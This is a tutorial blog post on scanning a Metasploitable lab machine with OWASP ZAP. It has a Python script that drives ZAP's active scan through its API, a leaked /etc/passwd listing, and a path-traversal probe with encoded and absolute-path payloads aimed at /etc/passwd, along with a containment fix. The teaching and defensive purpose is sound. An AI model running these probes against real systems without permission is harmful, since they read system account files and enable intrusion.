Vulnerability Scans using OWASP ZAP


I am Aaditya Purani, and in this post I am going to introduce OWASP ZAP and show how to run a first scan with it.


Today let's take a look at quick and easy website vulnerability checks with the OWASP Zed Attack Proxy, or "OWASP ZAP" for short. (Note: I am testing against my own machines. ZAP's active scan sends real attack traffic, so only scan systems you own or have written permission to test.)

I am using Kali Linux for this tutorial. OWASP ZAP comes preinstalled in Kali, so the steps below follow that setup.

1. Run ifconfig on the target (the Metasploitable system) and note its IP address.

2. Start Kali Linux, which will boot to the graphical user interface.

3. Start OWASP ZAP:

In the Kali Linux menu, OWASP ZAP is listed under the "Top 10 Security Tools" menu (if it is not there, update to the latest version of Kali):


OWASP ZAP will open to its main window.

4. Now simply enter the Metasploitable system's IP address (the one noted in step 1) into the "URL to attack" box and click "Attack":


That's it. OWASP ZAP will first spider the website to discover its pages and then run an active scan against everything it found:


It will also list any security issues it finds under the "Alerts" tab. Clicking on the tab shows the following alerts:
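The same Quick Start "Attack" (spider, then active scan, then read the Alerts tab) can be driven without the GUI through ZAP's REST API, which is how you would put a scan like this into a nightly job. The script below is an added example, not code from the original tutorial. It assumes ZAP was started headless with zap.sh -daemon -port 8090 -config api.key=changeme, and uses http://192.0.2.10/ as a documentation address standing in for the Metasploitable IP; the endpoint paths and JSON fields are ZAP's own, the canned responses at the bottom are constructed so the script runs offline.

```python
"""Drive ZAP's Quick Start "Attack" (spider, then active scan) through the
ZAP REST API instead of the GUI, then group the alerts the way the Alerts
tab does.

Added example, not code from the original tutorial.  Assumptions that are
not on the page: ZAP was started headless with
    zap.sh -daemon -port 8090 -config api.key=changeme
and the target is http://192.0.2.10/ (a documentation address standing in
for the Metasploitable VM).  The active scan sends real attack payloads, so
only point this at hosts you own or are authorised to test.
"""
import json
import time
import urllib.parse
import urllib.request
from collections import defaultdict

ZAP_API = "http://127.0.0.1:8090"   # assumption: where the ZAP daemon listens
API_KEY = "changeme"                # assumption: value passed as -config api.key
TARGET = "http://192.0.2.10/"       # assumption: stands in for the Metasploitable IP

RISK_ORDER = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}


def zap_get(path, params, api=ZAP_API, key=API_KEY):
    """Call one ZAP JSON API endpoint (GET) and return the decoded response."""
    query = urllib.parse.urlencode({**params, "apikey": key})
    with urllib.request.urlopen(f"{api}{path}?{query}", timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))


def wait_until_done(status_path, scan_id, fetch, poll_seconds):
    """Poll a spider/ascan status endpoint until it reports 100 percent."""
    while int(fetch(status_path, {"scanId": scan_id})["status"]) < 100:
        time.sleep(poll_seconds)


def quick_attack(target, fetch=zap_get, poll_seconds=2.0):
    """Spider the target, active-scan it, and return the alerts ZAP recorded."""
    spider_id = fetch("/JSON/spider/action/scan/", {"url": target})["scan"]
    wait_until_done("/JSON/spider/view/status/", spider_id, fetch, poll_seconds)
    ascan_id = fetch("/JSON/ascan/action/scan/", {"url": target})["scan"]
    wait_until_done("/JSON/ascan/view/status/", ascan_id, fetch, poll_seconds)
    return fetch("/JSON/core/view/alerts/", {"baseurl": target})["alerts"]


def summarise(alerts):
    """One 'folder' per alert name, as in the GUI: count, worst risk, affected URLs."""
    folders = defaultdict(lambda: {"count": 0, "risk": "Informational", "urls": []})
    for a in alerts:
        f = folders[a["alert"]]
        f["count"] += 1
        if RISK_ORDER.get(a["risk"], 0) > RISK_ORDER[f["risk"]]:
            f["risk"] = a["risk"]
        if a["url"] not in f["urls"]:
            f["urls"].append(a["url"])
    return dict(folders)


# Constructed stand-in for a ZAP daemon so the script runs offline.  Each
# status call reports more progress, as a real scan would.
_CANNED_STATUS = iter(["0", "60", "100", "0", "100"])
_CANNED_ALERTS = [
    {"alert": "Path Traversal", "risk": "High",
     "url": TARGET + "app/view.php?file=readme.txt", "param": "file",
     "attack": "../../../etc/passwd", "evidence": "root:x:0:0"},
    {"alert": "Path Traversal", "risk": "High",
     "url": TARGET + "app/view.php?file=help.txt", "param": "file",
     "attack": "../../../etc/passwd", "evidence": "root:x:0:0"},
    {"alert": "X-Frame-Options Header Not Set", "risk": "Medium",
     "url": TARGET, "param": "", "attack": "", "evidence": ""},
]


def canned_fetch(path, params):
    """Fake ZAP API: same endpoints and JSON shapes as the real daemon."""
    if path.endswith("/action/scan/"):
        return {"scan": "0"}
    if path.endswith("/view/status/"):
        return {"status": next(_CANNED_STATUS, "100")}
    if path == "/JSON/core/view/alerts/":
        return {"alerts": _CANNED_ALERTS}
    raise ValueError(f"unexpected endpoint {path}")


if __name__ == "__main__":
    # Swap canned_fetch for zap_get (and poll_seconds=2.0) to scan for real.
    for name, info in summarise(quick_attack(TARGET, canned_fetch, 0)).items():
        print(f"{info['risk']:<8} {info['count']:>3}  {name}")
        for url in info["urls"]:
            print(f"             {url}")
```

The alerts endpoint returns one entry per URL and parameter, which is why the GUI groups them into folders; summarise() does the same grouping so the output can be diffed between runs and a new High-risk folder can fail the job.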

OWASP ZAP Alerts

Wow, that is a lot of alerts! Each folder groups findings of one type. For this tutorial, let's just look at the "Path Traversal" folder.

Click to expand it, then click on the very first alert:

Path Traversal alert

On the right side you will see an explanation of the issue, together with the exact URL, parameter and attack value that triggered it:

Path Traversal vulnerable

Open the flagged URL in a browser and the server returns:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

That is the contents of /etc/passwd, the Linux account file. It holds user names, UIDs, home directories and login shells rather than password hashes (those live in /etc/shadow), but it still hands an attacker a list of valid accounts, and a web application that reads and returns any file on disk is exactly the exposure you never want: the same request with a different path can pull configuration files, credentials or application source instead.
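Before filing the alert it is worth confirming it by hand, and the fix is worth seeing next to the probe. The script below is an added example, not code from the original tutorial or from Metasploitable. It assumes the flagged request is a GET whose file parameter names a file the application reads from its document root and echoes back (http://192.0.2.10/app/view.php?file=readme.txt, a documentation address standing in for the Metasploitable IP); the vulnerable server at the bottom is a constructed stand-in so the probe runs offline, and it goes slightly beyond the page by also sending the single-URL-encoded form of each payload.

```python
"""Confirm the Path Traversal alert by hand, then show the server-side check
that would have prevented it.

Added example, not code from the original tutorial.  Assumptions that are
not on the page: the flagged request is a GET whose `file` parameter names
a file the application reads from its document root and returns, e.g.
http://192.0.2.10/app/view.php?file=readme.txt (documentation address
standing in for the Metasploitable IP).
"""
import os
import posixpath
import re
import urllib.parse
import urllib.request

# Signature of /etc/passwd: the root entry, uid 0 gid 0.  Works whether the
# application returns the file with newlines or squashed onto one line.
PASSWD_RE = re.compile(r"\broot:[^:\s]*:0:0:")


def looks_like_passwd(body):
    return PASSWD_RE.search(body) is not None


def traversal_payloads(target="etc/passwd", max_depth=8):
    """Parameter values to try, shallowest first.  Each depth is sent plainly
    and with '/' URL-encoded once, which gets past filters that reject a
    literal '../' but decode the value before opening the file."""
    payloads = []
    for depth in range(1, max_depth + 1):
        rel = "../" * depth + target
        payloads.append(rel)
        payloads.append(rel.replace("/", "%2F"))
    payloads.append("/" + target)   # absolute path, for apps with no prefix at all
    return payloads


def http_get(url):
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url, param, fetch=http_get):
    """Return (payload, evidence) for the first payload that leaks /etc/passwd,
    or None.  The query is built by concatenation on purpose: urlencode would
    turn the %2F variant into %252F, which is a different test."""
    for payload in traversal_payloads():
        match = PASSWD_RE.search(fetch(f"{base_url}?{param}={payload}"))
        if match:
            return payload, match.group(0)
    return None


# --- the fix --------------------------------------------------------------

def is_within(root, user_path):
    """True only if root/user_path, after resolving '..', symlinks and absolute
    paths, still lies inside root.  The trailing separator matters: without it
    /var/www/app2 would count as inside /var/www/app."""
    root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root, user_path))
    return full == root or full.startswith(root + os.sep)


def safe_open_path(root, user_path):
    """Resolve a user-supplied file name against root, or refuse it."""
    if not is_within(root, user_path):
        raise ValueError(f"refusing path outside {root}: {user_path!r}")
    return os.path.realpath(os.path.join(root, user_path))


# --- constructed vulnerable server so the probe can run offline ------------

PASSWD_SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash\n"
)
FAKE_FS = {"/etc/passwd": PASSWD_SAMPLE,
           "/var/www/app/readme.txt": "Welcome to the app.\n"}
DOC_ROOT = "/var/www/app/"


def vulnerable_fetch(url):
    """Behaves like the flawed handler: decodes the parameter once and joins
    it onto the document root with no containment check."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    path = posixpath.normpath(DOC_ROOT + query.get("file", [""])[0])
    return FAKE_FS.get(path, "No such file\n")


if __name__ == "__main__":
    print("probe:", probe("http://192.0.2.10/app/view.php", "file", vulnerable_fetch))
    for p in ["readme.txt", "../../../etc/passwd", "/etc/passwd"]:
        print(f"{p!r:>24} inside doc root: {is_within('/var/www/app', p)}")
```

To run the probe against the real target, drop the fetch argument so http_get is used, and keep the payload list short: one confirmed hit is enough evidence, and every extra request is noise in the target's logs. The fix is the containment check, not a blacklist of "../": the encoded and absolute-path payloads exist precisely because string filters miss them.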


So this is how you run a full scan with OWASP ZAP. More on OWASP ZAP, including fuzzing, is coming soon.

